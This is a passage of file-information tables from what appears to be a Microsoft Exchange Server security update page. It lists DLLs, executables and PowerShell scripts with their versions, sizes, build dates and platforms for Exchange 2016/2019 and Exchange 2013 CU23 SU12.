15.1.2308.20| 20,872| 3-Nov-21| 19:43| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.1.2308.20| 31,624| 3-Nov-21| 20:15| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.1.2308.20| 46,968| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.1.2308.20| 30,088| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.1.2308.20| 53,112| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.1.2308.20| 44,920| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.1.2308.20| 18,296| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.1.2308.20| 46,464| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.1.2308.20| 46,472| 3-Nov-21| 20:15| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.1.2308.20| 28,048| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.transport.common.dll| 15.1.2308.20| 457,104| 3-Nov-21| 19:35| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.1.2308.20| 18,296| 3-Nov-21| 19:54| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.1.2308.20| 30,592| 3-Nov-21| 18:57| x86 \nMicrosoft.exchange.transport.dll| 15.1.2308.20| 4,184,952| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.1.2308.20| 182,152| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.1.2308.20| 121,744| 3-Nov-21| 18:30| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.1.2308.20| 403,344| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.1.2308.20| 14,720| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.1.2308.20| 86,928| 3-Nov-21| 18:58| x86 \nMicrosoft.exchange.transport.logging.dll| 15.1.2308.20| 88,968| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.1.2308.20| 68,488| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.1.2308.20| 63,352| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.1.2308.20| 430,472| 3-Nov-21| 21:46| x86 \nMicrosoft.exchange.transport.net.dll| 15.1.2308.20| 122,256| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.1.2308.20| 17,784| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.1.2308.20| 29,056| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.1.2308.20| 60,792| 3-Nov-21| 19:57| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.1.2308.20| 50,040| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.1.2308.20| 33,144| 3-Nov-21| 19:55| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.1.2308.20| 113,016| 3-Nov-21| 19:57| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.1.2308.20| 18,296| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.1.2308.20| 52,112| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.transport.storage.dll| 15.1.2308.20| 675,192| 3-Nov-21| 19:57| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.1.2308.20| 21,896| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.1.2308.20| 17,800| 3-Nov-21| 20:25| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.1.2308.20| 487,296| 3-Nov-21| 20:24| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.1.2308.20| 12,680| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.1.2308.20| 306,056| 3-Nov-21| 20:27| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.1.2308.20| 15,736| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.1.2308.20| 46,480| 3-Nov-21| 20:26| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.1.2308.20| 1,044,368| 3-Nov-21| 20:30| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.1.2308.20| 15,240| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.1.2308.20| 18,824| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.1.2308.20| 18,832| 3-Nov-21| 20:29| x86 \nMicrosoft.exchange.um.callrouter.exe| 15.1.2308.20| 22,416| 3-Nov-21| 20:25| x86 \nMicrosoft.exchange.um.clientstrings.dll| 15.1.2308.20| 60,296| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.um.grammars.dll| 15.1.2308.20| 211,856| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.um.lad.dll| 15.1.2308.20| 120,696| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.um.prompts.dll| 15.1.2308.20| 214,928| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.1.2308.20| 118,648| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 15.1.2308.20| 239,496| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.1.2308.20| 925,560| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.um.umcore.dll| 15.1.2308.20| 1,471,872| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.1.2308.20| 32,656| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.1.2308.20| 41,848| 3-Nov-21| 18:48| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.1.2308.20| 24,952| 3-Nov-21| 19:33| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 15.1.2308.20| 130,440| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.1.2308.20| 83,320| 3-Nov-21| 20:49| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.1.2308.20| 50,056| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.1.2308.20| 658,832| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.1.2308.20| 186,256| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.1.2308.20| 67,448| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.1.2308.20| 12,664| 3-Nov-21| 18:29| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.1.2308.20| 56,696| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.2308.20| 28,024| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.2308.20| 120,720| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.2308.20| 31,632| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.2308.20| 57,208| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.1.2308.20| 35,720| 3-Nov-21| 18:29| x86 \nMicrosoft.exchange.webservices.dll| 15.1.2308.20| 1,054,088| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.1.2308.20| 67,976| 3-Nov-21| 18:30| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.1.2308.20| 23,440| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.wopiclient.dll| 15.1.2308.20| 77,176| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.2308.20| 17,288| 3-Nov-21| 18:42| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.2308.20| 29,048| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.1.2308.20| 505,224| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.2308.20| 14,736| 3-Nov-21| 18:28| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.2308.20| 36,744| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.2308.20| 66,424| 3-Nov-21| 19:51| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.1.2308.20| 19,320| 3-Nov-21| 18:20| x86 \nMicrosoft.filtering.dll| 15.1.2308.20| 113,016| 3-Nov-21| 18:54| x86 \nMicrosoft.filtering.exchange.dll| 15.1.2308.20| 57,216| 3-Nov-21| 20:11| x86 \nMicrosoft.filtering.interop.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:52| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.2308.20| 46,968| 3-Nov-21| 19:25| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.2308.20| 15,736| 3-Nov-21| 18:37| x64 \nMicrosoft.forefront.filtering.common.dll| 15.1.2308.20| 23,952| 3-Nov-21| 18:29| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.2308.20| 22,392| 3-Nov-21| 18:20| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.2308.20| 34,696| 3-Nov-21| 18:29| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,894| 3-Nov-21| 21:06| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,274| 3-Nov-21| 21:06| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.2308.20| 1,518,472| 3-Nov-21| 21:48| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:36| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.2308.20| 33,168| 3-Nov-21| 21:26| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.2308.20| 18,312| 3-Nov-21| 18:20| x86 \nMicrosoft.forefront.reporting.common.dll| 15.1.2308.20| 46,456| 3-Nov-21| 20:12| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.2308.20| 50,576| 3-Nov-21| 20:14| x86 \nMicrosoft.isam.esent.collections.dll| 15.1.2308.20| 72,592| 3-Nov-21| 18:41| x86 \nMicrosoft.isam.esent.interop.dll| 15.1.2308.20| 533,896| 3-Nov-21| 18:37| x86 \nMicrosoft.managementgui.dll| 15.1.2308.20| 133,496| 3-Nov-21| 18:20| x86 \nMicrosoft.mce.interop.dll| 15.1.2308.20| 24,440| 3-Nov-21| 18:20| x86 \nMicrosoft.office.audit.dll| 15.1.2308.20| 123,768| 3-Nov-21| 18:20| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.2308.20| 593,288| 3-Nov-21| 19:05| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.2308.20| 42,360| 3-Nov-21| 18:52| x86 \nMicrosoft.office.compliance.console.core.dll| 15.1.2308.20| 217,992| 3-Nov-21| 22:40| x86 \nMicrosoft.office.compliance.console.dll| 15.1.2308.20| 854,904| 3-Nov-21| 22:50| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.1.2308.20| 485,776| 3-Nov-21| 22:45| x86 \nMicrosoft.office.compliance.core.dll| 15.1.2308.20| 413,072| 3-Nov-21| 18:54| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.1.2308.20| 36,216| 3-Nov-21| 18:52| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.2308.20| 85,384| 3-Nov-21| 20:11| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.2308.20| 1,783,176| 3-Nov-21| 18:36| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.2308.20| 49,528| 3-Nov-21| 20:07| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.2308.20| 27,536| 3-Nov-21| 20:11| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.2308.20| 174,984| 3-Nov-21| 18:54| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.2308.20| 166,264| 3-Nov-21| 19:34| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.1.2308.20| 40,312| 3-Nov-21| 18:20| x86 \nMicrosoft.online.box.shell.dll| 15.1.2308.20| 46,456| 3-Nov-21| 18:28| x86 \nMicrosoft.powershell.hostingtools.dll| 15.1.2308.20| 67,976| 3-Nov-21| 18:20| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.1.2308.20| 67,976| 3-Nov-21| 18:20| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.1.2308.20| 120,208| 3-Nov-21| 18:48| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,106| 3-Nov-21| 18:41| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,048| 3-Nov-21| 18:41| Not applicable \nMovemailbox.ps1| Not applicable| 61,180| 3-Nov-21| 18:41| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,586| 3-Nov-21| 18:41| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,552| 3-Nov-21| 18:41| Not applicable \nMpgearparser.dll| 15.1.2308.20| 99,704| 3-Nov-21| 18:23| x64 \nMsclassificationadapter.dll| 15.1.2308.20| 248,712| 3-Nov-21| 18:36| x64 \nMsexchangecompliance.exe| 15.1.2308.20| 78,728| 3-Nov-21| 20:38| x86 \nMsexchangedagmgmt.exe| 15.1.2308.20| 25,480| 3-Nov-21| 20:20| x86 \nMsexchangedelivery.exe| 15.1.2308.20| 38,776| 3-Nov-21| 20:18| x86 \nMsexchangefrontendtransport.exe| 15.1.2308.20| 31,608| 3-Nov-21| 20:11| x86 \nMsexchangehmhost.exe| 15.1.2308.20| 27,000| 3-Nov-21| 21:46| x86 \nMsexchangehmrecovery.exe| 15.1.2308.20| 29,560| 3-Nov-21| 19:35| x86 \nMsexchangemailboxassistants.exe| 15.1.2308.20| 72,568| 3-Nov-21| 20:18| x86 \nMsexchangemailboxreplication.exe| 15.1.2308.20| 20,880| 3-Nov-21| 20:32| x86 \nMsexchangemigrationworkflow.exe| 15.1.2308.20| 68,984| 3-Nov-21| 20:36| x86 \nMsexchangerepl.exe| 15.1.2308.20| 72,056| 3-Nov-21| 20:18| x86 \nMsexchangesubmission.exe| 15.1.2308.20| 123,272| 3-Nov-21| 20:30| x86 \nMsexchangethrottling.exe| 15.1.2308.20| 39,824| 3-Nov-21| 19:25| x86 \nMsexchangetransport.exe| 15.1.2308.20| 74,128| 3-Nov-21| 19:25| x86 \nMsexchangetransportlogsearch.exe| 15.1.2308.20| 139,144| 3-Nov-21| 20:13| x86 \nMsexchangewatchdog.exe| 15.1.2308.20| 55,696| 3-Nov-21| 18:23| x64 \nMspatchlinterop.dll| 15.1.2308.20| 53,640| 3-Nov-21| 18:41| x64 \nNativehttpproxy.dll| 15.1.2308.20| 91,512| 3-Nov-21| 18:38| x64 \nNavigatorparser.dll| 15.1.2308.20| 636,816| 3-Nov-21| 18:23| x64 \nNego2nativeinterface.dll| 15.1.2308.20| 19,336| 3-Nov-21| 18:37| x64 \nNegotiateclientcertificatemodule.dll| 15.1.2308.20| 30,072| 3-Nov-21| 18:37| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,248| 3-Nov-21| 18:41| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,599| 3-Nov-21| 18:41| Not applicable \nNtspxgen.dll| 15.1.2308.20| 80,760| 3-Nov-21| 18:41| x64 \nOleconverter.exe| 15.1.2308.20| 173,944| 3-Nov-21| 18:41| x64 \nOutsideinmodule.dll| 15.1.2308.20| 87,952| 3-Nov-21| 18:36| x64 \nOwaauth.dll| 15.1.2308.20| 92,024| 3-Nov-21| 18:37| x64 \nOwasmime.msi| Not applicable| 720,896| 3-Nov-21| 18:41| Not applicable \nPerf_common_extrace.dll| 15.1.2308.20| 245,128| 3-Nov-21| 18:22| x64 \nPerf_exchmem.dll| 15.1.2308.20| 85,904| 3-Nov-21| 18:23| x64 \nPipeline2.dll| 15.1.2308.20| 1,454,464| 3-Nov-21| 18:43| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.2308.20| 41,360| 3-Nov-21| 20:58| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 70,975| 3-Nov-21| 18:41| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,249| 3-Nov-21| 18:41| Not applicable \nProductinfo.managed.dll| 15.1.2308.20| 27,000| 3-Nov-21| 18:20| x86 \nProxybinclientsstringsdll| 15.1.2308.20| 924,544| 3-Nov-21| 18:36| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,222| 3-Nov-21| 18:41| Not applicable \nQuietexe.exe| 15.1.2308.20| 14,712| 3-Nov-21| 18:22| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,524| 3-Nov-21| 18:36| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,639| 3-Nov-21| 21:00| Not applicable \nRemoteexchange.ps1| Not applicable| 23,593| 3-Nov-21| 21:05| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,704| 3-Nov-21| 18:41| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,022| 3-Nov-21| 18:41| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,032| 3-Nov-21| 18:41| Not applicable \nReplaycrimsonmsg.dll| 15.1.2308.20| 1,099,128| 3-Nov-21| 18:20| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,456| 3-Nov-21| 21:00| Not applicable \nResetcasservice.ps1| Not applicable| 21,687| 3-Nov-21| 18:41| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,121| 3-Nov-21| 18:20| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,161| 3-Nov-21| 18:44| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,190| 3-Nov-21| 18:36| Not applicable \nRightsmanagementwrapper.dll| 15.1.2308.20| 86,400| 3-Nov-21| 18:41| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,774| 3-Nov-21| 18:41| Not applicable \nRpcperf.dll| 15.1.2308.20| 23,416| 3-Nov-21| 18:22| x64 \nRpcproxyshim.dll| 15.1.2308.20| 39,304| 3-Nov-21| 18:41| x64 \nRulesauditmsg.dll| 15.1.2308.20| 12,680| 3-Nov-21| 18:37| x64 \nRwsperfcounters.xml| Not applicable| 23,048| 3-Nov-21| 21:07| Not applicable \nSafehtmlnativewrapper.dll| 15.1.2308.20| 34,680| 3-Nov-21| 18:37| x64 \nScanenginetest.exe| 15.1.2308.20| 956,296| 3-Nov-21| 18:37| x64 \nScanningprocess.exe| 15.1.2308.20| 739,192| 3-Nov-21| 18:48| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,832| 3-Nov-21| 18:41| Not applicable \nServicecontrol.ps1| Not applicable| 52,349| 3-Nov-21| 18:44| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,754| 3-Nov-21| 18:41| Not applicable \nSettingsadapter.dll| 15.1.2308.20| 115,600| 3-Nov-21| 18:30| x64 \nSetup.exe| 15.1.2308.20| 20,856| 3-Nov-21| 18:43| x86 \nSetupui.exe| 15.1.2308.20| 49,040| 3-Nov-21| 20:53| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,169| 3-Nov-21| 18:41| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,831| 3-Nov-21| 18:37| Not applicable \nStatisticsutil.dll| 15.1.2308.20| 142,224| 3-Nov-21| 18:30| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,113| 3-Nov-21| 18:36| Not applicable \nStoretsconstants.ps1| Not applicable| 15,830| 3-Nov-21| 18:52| Not applicable \nStoretslibrary.ps1| Not applicable| 28,003| 3-Nov-21| 18:52| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2308.20| 28,536| 3-Nov-21| 18:22| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,947| 3-Nov-21| 18:41| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,993| 3-Nov-21| 18:41| Not applicable \nTextconversionmodule.dll| 15.1.2308.20| 86,416| 3-Nov-21| 18:37| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,747| 3-Nov-21| 18:52| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,433| 3-Nov-21| 18:52| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,029| 3-Nov-21| 18:52| Not applicable \nUmservice.exe| 15.1.2308.20| 100,240| 3-Nov-21| 20:26| x86 \nUmworkerprocess.exe| 15.1.2308.20| 38,280| 3-Nov-21| 20:22| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,493| 3-Nov-21| 18:20| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,050| 3-Nov-21| 18:41| Not applicable \nUpdatecas.ps1| Not applicable| 35,363| 3-Nov-21| 18:44| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,762| 3-Nov-21| 18:44| Not applicable \nUpdateserver.exe| 15.1.2308.20| 3,014,544| 3-Nov-21| 18:41| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,140| 3-Nov-21| 18:41| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 32,048| 3-Nov-21| 22:38| Not applicable \nWsbexchange.exe| 15.1.2308.20| 125,320| 3-Nov-21| 18:41| x64 \nX400prox.dll| 15.1.2308.20| 103,288| 3-Nov-21| 18:37| x64 \n_search.lingoperators.a| 15.1.2308.20| 34,680| 3-Nov-21| 19:55| Not applicable \n_search.lingoperators.b| 15.1.2308.20| 34,680| 3-Nov-21| 19:55| Not applicable \n_search.mailboxoperators.a| 15.1.2308.20| 289,144| 3-Nov-21| 20:27| Not applicable \n_search.mailboxoperators.b| 15.1.2308.20| 289,144| 3-Nov-21| 20:27| Not applicable \n_search.operatorschema.a| 15.1.2308.20| 483,208| 3-Nov-21| 19:41| Not applicable \n_search.operatorschema.b| 15.1.2308.20| 483,208| 3-Nov-21| 19:41| Not applicable \n_search.tokenoperators.a| 15.1.2308.20| 106,880| 3-Nov-21| 19:53| Not applicable \n_search.tokenoperators.b| 15.1.2308.20| 106,880| 3-Nov-21| 19:53| Not applicable \n_search.transportoperators.a| 15.1.2308.20| 64,904| 3-Nov-21| 20:32| Not applicable \n_search.transportoperators.b| 15.1.2308.20| 64,904| 3-Nov-21| 20:32| Not applicable \n \n### \n\n__\n\nMicrosoft Exchange Server 2013 Cumulative Update 23 Security Update 12\n\nFile name| File version| File size| Date| Time| Platform| SP requirement \n---|---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.0.1497.26| 70,568| 28-Oct-21| 19:31| x64| SP. \nAdduserstopfrecursive.ps1| Not applicable| 15,038| 28-Oct-21| 19:31| Not applicable| SP. \nAirfilter.dll| 15.0.1497.26| 41,896| 28-Oct-21| 19:31| x64| SP. \nAjaxcontroltoolkit.dll| 15.0.1497.26| 96,680| 28-Oct-21| 19:31| x86| SP. \nBase.cab.cab| Not applicable| #########| 8-Nov-21| 19:47| Not applicable| SP. \nCafe_airfilter_dll| 15.0.1497.26| 41,896| 28-Oct-21| 19:31| x64| SP. \nCafe_owaauth_dll| 15.0.1497.26| 91,552| 28-Oct-21| 19:31| x64| SP. \nCheckinvalidrecipients.ps1| Not applicable| 23,105| 28-Oct-21| 19:31| Not applicable| SP. \nChksgfiles.dll| 15.0.1497.26| 56,728| 28-Oct-21| 19:29| x64| SP. \nCitsconstants.ps1| Not applicable| 15,849| 28-Oct-21| 19:28| Not applicable| SP. \nCitslibrary.ps1| Not applicable| 82,728| 28-Oct-21| 19:28| Not applicable| SP. \nCitstypes.ps1| Not applicable| 14,524| 28-Oct-21| 19:28| Not applicable| SP. \nCommonconnectfunctions.ps1| Not applicable| 30,007| 28-Oct-21| 19:31| Not applicable| SP. \nConfigureadam.ps1| Not applicable| 23,383| 28-Oct-21| 19:31| Not applicable| SP. \nConfigurecaferesponseheaders.ps1| Not applicable| 19,961| 28-Oct-21| 19:31| Not applicable| SP. \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,328| 28-Oct-21| 19:31| Not applicable| SP. \nConfiguresmbipsec.ps1| Not applicable| 39,887| 28-Oct-21| 19:31| Not applicable| SP. \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,316| 28-Oct-21| 19:31| Not applicable| SP. \nConnectfunctions.ps1| Not applicable| 38,363| 28-Oct-21| 19:31| Not applicable| SP. \nConnect_exchangeserver_help.xml| Not applicable| 30,388| 28-Oct-21| 19:32| Not applicable| SP. \nConsoleinitialize.ps1| Not applicable| 24,292| 28-Oct-21| 19:31| Not applicable| SP. \nConvertoabvdir.ps1| Not applicable| 20,129| 28-Oct-21| 19:31| Not applicable| SP. \nConverttomessagelatency.ps1| Not applicable| 14,592| 28-Oct-21| 19:31| Not applicable| SP. \nCts_microsoft.exchange.data.common.dll| 15.0.1497.26| 1,653,232| 28-Oct-21| 19:31| x86| SP. \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,398| 28-Oct-21| 19:28| Not applicable| SP. \nDisableinmemorytracing.ps1| Not applicable| 13,422| 28-Oct-21| 19:31| Not applicable| SP. \nDisable_antimalwarescanning.ps1| Not applicable| 15,249| 28-Oct-21| 19:31| Not applicable| SP. \nDisable_outsidein.ps1| Not applicable| 13,714| 28-Oct-21| 19:31| Not applicable| SP. \nDsaccessperf.dll| 15.0.1497.26| 45,488| 28-Oct-21| 19:31| x64| SP. \nDscperf.dll| 15.0.1497.26| 24,496| 28-Oct-21| 19:31| x64| SP. \nDup_cts_microsoft.exchange.data.common.dll| 15.0.1497.26| 1,653,232| 28-Oct-21| 19:31| x86| SP. \nDup_ext_microsoft.exchange.data.transport.dll| 15.0.1497.26| 396,752| 28-Oct-21| 19:35| x86| SP. \nEdgetransport.exe| 15.0.1497.26| 40,920| 28-Oct-21| 19:31| x86| SP. \nEnableinmemorytracing.ps1| Not applicable| 13,436| 28-Oct-21| 19:31| Not applicable| SP. \nEnable_antimalwarescanning.ps1| Not applicable| 17,639| 28-Oct-21| 19:31| Not applicable| SP. \nEnable_crossforestconnector.ps1| Not applicable| 18,674| 28-Oct-21| 19:31| Not applicable| SP. \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,959| 28-Oct-21| 19:31| Not applicable| SP. \nEnable_outsidein.ps1| Not applicable| 13,723| 28-Oct-21| 19:31| Not applicable| SP. \nEngineupdateserviceinterfaces.dll| 15.0.1497.26| 17,840| 28-Oct-21| 19:33| x86| SP. \nEse.dll| 15.0.1497.26| 3,254,704| 28-Oct-21| 19:31| x64| SP. \nEseback2.dll| 15.0.1497.26| 305,072| 28-Oct-21| 19:31| x64| SP. \nEsebcli2.dll| 15.0.1497.26| 274,864| 28-Oct-21| 19:31| x64| SP. \nEseperf.dll| 15.0.1497.26| 111,024| 28-Oct-21| 19:31| x64| SP. \nEseutil.exe| 15.0.1497.26| 370,608| 28-Oct-21| 19:31| x64| SP. \nEsevss.dll| 15.0.1497.26| 43,952| 28-Oct-21| 19:31| x64| SP. \nExchange.depthtwo.types.ps1xml| Not applicable| 38,399| 28-Oct-21| 19:31| Not applicable| SP. \nExchange.format.ps1xml| Not applicable| 502,266| 28-Oct-21| 19:31| Not applicable| SP. \nExchange.partial.types.ps1xml| Not applicable| 32,625| 28-Oct-21| 19:31| Not applicable| SP. \nExchange.ps1| Not applicable| 20,595| 28-Oct-21| 19:31| Not applicable| SP. \nExchange.support.format.ps1xml| Not applicable| 26,602| 28-Oct-21| 19:31| Not applicable| SP. \nExchange.types.ps1xml| Not applicable| 334,317| 28-Oct-21| 19:31| Not applicable| SP. \nExchmem.dll| 15.0.1497.26| 80,296| 28-Oct-21| 19:31| x64| SP. \nExchucutil.ps1| Not applicable| 23,976| 28-Oct-21| 19:31| Not applicable| SP. \nExdbfailureitemapi.dll| 15.0.1497.26| 27,560| 28-Oct-21| 19:31| x64| SP. \nExdbmsg.dll| 15.0.1497.26| 198,568| 28-Oct-21| 19:31| x64| SP. \nExportedgeconfig.ps1| Not applicable| 27,451| 28-Oct-21| 19:31| Not applicable| SP. \nExport_mailpublicfoldersformigration.ps1| Not applicable| 36,570| 28-Oct-21| 19:31| Not applicable| SP. \nExport_publicfolderstatistics.ps1| Not applicable| 23,205| 28-Oct-21| 19:31| Not applicable| SP. \nExport_retentiontags.ps1| Not applicable| 17,120| 28-Oct-21| 19:31| Not applicable| SP. 